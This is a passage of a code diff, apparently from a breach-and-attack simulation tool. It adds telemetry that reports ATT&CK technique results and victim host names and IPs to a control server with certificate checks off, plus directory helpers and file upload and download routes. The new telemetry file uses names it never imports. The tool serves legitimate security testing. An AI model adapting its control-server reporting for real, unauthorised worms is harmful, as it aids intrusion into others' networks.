+import json
+from infection_monkey.control import ControlClient
+import logging
+
+__author__ = "VakarisZ"
+
+LOG = logging.getLogger(__name__)
+
+
+class AttackTelem(object):
+
+ def __init__(self, technique, status, data=None):
+ """
+ Default ATT&CK telemetry constructor
+ :param technique: Technique ID. E.g. T111
+ :param status: int from ScanStatus Enum
+ :param data: Other data relevant to the attack technique
+ """
+ self.technique = technique
+ self.result = status
+ self.data = {'status': status, 'id': GUID}
+ if data:
+ self.data.update(data)
+
+ def send(self):
+ """
+ Sends telemetry to island
+ """
+ if not WormConfiguration.current_server:
+ return
+ try:
+ requests.post("https://%s/api/attack/%s" % (WormConfiguration.current_server, self.technique),
+ data=json.dumps(self.data),
+ headers={'content-type': 'application/json'},
+ verify=False,
+ proxies=ControlClient.proxies)
+ except Exception as exc:
+ LOG.warn("Error connecting to control server %s: %s",
+ WormConfiguration.current_server, exc)
diff --git a/monkey/infection_monkey/transport/attack_telems/victim_host_telem.py b/monkey/infection_monkey/transport/attack_telems/victim_host_telem.py
new file mode 100644
index 000000000..ecab5a648
--- /dev/null
+++ b/monkey/infection_monkey/transport/attack_telems/victim_host_telem.py
@@ -0,0 +1,18 @@
+from infection_monkey.transport.attack_telems.base_telem import AttackTelem
+
+__author__ = "VakarisZ"
+
+
+class VictimHostTelem(AttackTelem):
+
+ def __init__(self, technique, status, machine, data=None):
+ """
+ ATT&CK telemetry that parses and sends VictimHost's (remote machine's) data
+ :param technique: Technique ID. E.g. T111
+ :param status: int from ScanStatus Enum
+ :param machine: VictimHost obj from model/host.py
+ :param data: Other data relevant to the attack technique
+ """
+ super(VictimHostTelem, self).__init__(technique, status, data)
+ victim_host = {'hostname': machine.domain_name, 'ip': machine.ip_addr}
+ self.data.update({'machine': victim_host})
diff --git a/monkey/infection_monkey/utils.py b/monkey/infection_monkey/utils.py
index 635f2360d..741d7c950 100644
--- a/monkey/infection_monkey/utils.py
+++ b/monkey/infection_monkey/utils.py
@@ -1,5 +1,6 @@
import os
import sys
+import shutil
import struct
from infection_monkey.config import WormConfiguration
@@ -35,3 +36,25 @@ def utf_to_ascii(string):
# Converts utf string to ascii. Safe to use even if string is already ascii.
udata = string.decode("utf-8")
return udata.encode("ascii", "ignore")
+
+
+def create_monkey_dir():
+ """
+ Creates directory for monkey and related files
+ """
+ if not os.path.exists(get_monkey_dir_path()):
+ os.mkdir(get_monkey_dir_path())
+
+
+def remove_monkey_dir():
+ """
+ Removes monkey's root directory
+ """
+ shutil.rmtree(get_monkey_dir_path(), ignore_errors=True)
+
+
+def get_monkey_dir_path():
+ if is_windows_os():
+ return WormConfiguration.monkey_dir_windows
+ else:
+ return WormConfiguration.monkey_dir_linux
diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py
index c23213eac..b1697f5a5 100644
--- a/monkey/monkey_island/cc/app.py
+++ b/monkey/monkey_island/cc/app.py
@@ -27,9 +27,12 @@ from monkey_island.cc.resources.report import Report
from monkey_island.cc.resources.root import Root
from monkey_island.cc.resources.telemetry import Telemetry
from monkey_island.cc.resources.telemetry_feed import TelemetryFeed
+from monkey_island.cc.resources.pba_file_download import PBAFileDownload
from monkey_island.cc.services.config import ConfigService
from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH
from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService
+from monkey_island.cc.resources.pba_file_upload import FileUpload
+from monkey_island.cc.resources.attack_telem import AttackTelem
__author__ = 'Barak'
@@ -121,6 +124,11 @@ def init_app(mongo_url):
api.add_resource(TelemetryFeed, '/api/telemetry-feed', '/api/telemetry-feed/')
api.add_resource(Log, '/api/log', '/api/log/')
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
+ api.add_resource(PBAFileDownload, '/api/pba/download/